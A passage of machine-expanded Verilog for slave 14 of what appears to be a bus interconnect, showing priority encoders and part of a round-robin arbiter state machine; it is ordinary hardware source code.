            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'h1 ) 
                begin
                    s14_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'h2 ) 
                    begin
                        s14_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s14_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[3] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[3]) ) 
        begin
            s14_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s14_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[4] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[4]) ) 
        begin
            s14_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'h1 ) 
                begin
                    s14_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'h2 ) 
                    begin
                        s14_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s14_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[4] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[4]) ) 
        begin
            s14_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s14_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[5] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[5]) ) 
        begin
            s14_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'h1 ) 
                begin
                    s14_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'h2 ) 
                    begin
                        s14_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s14_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[5] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[5]) ) 
        begin
            s14_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s14_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[6] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[6]) ) 
        begin
            s14_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'h1 ) 
                begin
                    s14_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'h2 ) 
                    begin
                        s14_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s14_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[6] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[6]) ) 
        begin
            s14_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s14_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[7] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[7]) ) 
        begin
            s14_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'h1 ) 
                begin
                    s14_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'h2 ) 
                    begin
                        s14_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s14_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s14_msel_pri_enc_valid[7] or  { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) })
    begin
        if (  !( s14_msel_pri_enc_valid[7]) ) 
        begin
            s14_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'h0 ) 
            begin
                s14_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s14_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s14_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s14_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd0_pri_out_d0 ) : ( s14_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s14_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd1_pri_out_d0 ) : ( s14_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd2_pri_out_d0 ) : ( s14_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd3_pri_out_d0 ) : ( s14_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd4_pri_out_d0 ) : ( s14_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd5_pri_out_d0 ) : ( s14_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd6_pri_out_d0 ) : ( s14_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd7_pri_out_d0 ) : ( s14_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s14_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd0_pri_out_d0 ) : ( s14_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s14_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd1_pri_out_d0 ) : ( s14_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd2_pri_out_d0 ) : ( s14_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd3_pri_out_d0 ) : ( s14_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd4_pri_out_d0 ) : ( s14_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd5_pri_out_d0 ) : ( s14_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd6_pri_out_d0 ) : ( s14_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd7_pri_out_d0 ) : ( s14_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s14_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s14_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s14_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s14_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s14_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s14_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s14_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s14_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd0_pri_out_d0 ) : ( s14_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s14_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd1_pri_out_d0 ) : ( s14_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd2_pri_out_d0 ) : ( s14_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd3_pri_out_d0 ) : ( s14_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd4_pri_out_d0 ) : ( s14_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd5_pri_out_d0 ) : ( s14_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd6_pri_out_d0 ) : ( s14_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s14_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s14_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s14_msel_pri_enc_pd7_pri_out_d0 ) : ( s14_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s14_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s14_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s14_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s14_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s14_next ) 
            begin
                s14_msel_pri_out <= ( ( ( s14_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s14_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s14_msel_pri_enc_pri_out0 ) : ( s14_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s14_msel_arb0_req = { ( s14_msel_req[7] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'd0 ) ), ( s14_msel_req[6] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'd0 ) ), ( s14_msel_req[5] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'd0 ) ), ( s14_msel_req[4] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'd0 ) ), ( s14_msel_req[3] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'd0 ) ), ( s14_msel_req[2] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[5] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[4] ) ) } == 2'd0 ) ), ( s14_msel_req[1] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[3] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[2] ) ) } == 2'd0 ) ), ( s14_msel_req[0] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[1] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[0] ) ) } == 2'd0 ) ) };
    assign s14_msel_arb0_gnt = s14_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s14_msel_arb0_state <= s14_msel_arb0_grant0;
        end
        else
        begin 
            s14_msel_arb0_state <= s14_msel_arb0_next_state;
        end
    end
    always @ (  s14_msel_arb0_state or  { ( s14_msel_req[7] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'd0 ) ), ( s14_msel_req[6] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'd0 ) ), ( s14_msel_req[5] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'd0 ) ), ( s14_msel_req[4] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'd0 ) ), ( s14_msel_req[3] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'd0 ) ), ( s14_msel_req[2] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[5] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[4] ) ) } == 2'd0 ) ), ( s14_msel_req[1] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[3] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[2] ) ) } == 2'd0 ) ), ( s14_msel_req[0] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[1] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s14_msel_arb0_next_state = s14_msel_arb0_state;
        case ( s14_msel_arb0_state ) 
        s14_msel_arb0_grant0:
        begin
            if (  !( s14_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s14_msel_arb0_req[1] ) 
                begin
                    s14_msel_arb0_next_state = s14_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s14_msel_arb0_req[2] ) 
                    begin
                        s14_msel_arb0_next_state = s14_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s14_msel_arb0_req[3] ) 
                        begin
                            s14_msel_arb0_next_state = s14_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s14_msel_arb0_req[4] ) 
                            begin
                                s14_msel_arb0_next_state = s14_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s14_msel_arb0_req[5] ) 
                                begin
                                    s14_msel_arb0_next_state = s14_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb0_req[6] ) 
                                    begin
                                        s14_msel_arb0_next_state = s14_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb0_req[7] ) 
                                        begin
                                            s14_msel_arb0_next_state = s14_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb0_grant1:
        begin
            if (  !( s14_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s14_msel_arb0_req[2] ) 
                begin
                    s14_msel_arb0_next_state = s14_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s14_msel_arb0_req[3] ) 
                    begin
                        s14_msel_arb0_next_state = s14_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s14_msel_arb0_req[4] ) 
                        begin
                            s14_msel_arb0_next_state = s14_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s14_msel_arb0_req[5] ) 
                            begin
                                s14_msel_arb0_next_state = s14_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s14_msel_arb0_req[6] ) 
                                begin
                                    s14_msel_arb0_next_state = s14_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb0_req[7] ) 
                                    begin
                                        s14_msel_arb0_next_state = s14_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb0_req[0] ) 
                                        begin
                                            s14_msel_arb0_next_state = s14_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb0_grant2:
        begin
            if (  !( s14_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s14_msel_arb0_req[3] ) 
                begin
                    s14_msel_arb0_next_state = s14_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s14_msel_arb0_req[4] ) 
                    begin
                        s14_msel_arb0_next_state = s14_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s14_msel_arb0_req[5] ) 
                        begin
                            s14_msel_arb0_next_state = s14_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s14_msel_arb0_req[6] ) 
                            begin
                                s14_msel_arb0_next_state = s14_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s14_msel_arb0_req[7] ) 
                                begin
                                    s14_msel_arb0_next_state = s14_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb0_req[0] ) 
                                    begin
                                        s14_msel_arb0_next_state = s14_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb0_req[1] ) 
                                        begin
                                            s14_msel_arb0_next_state = s14_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb0_grant3:
        begin
            if (  !( s14_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s14_msel_arb0_req[4] ) 
                begin
                    s14_msel_arb0_next_state = s14_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s14_msel_arb0_req[5] ) 
                    begin
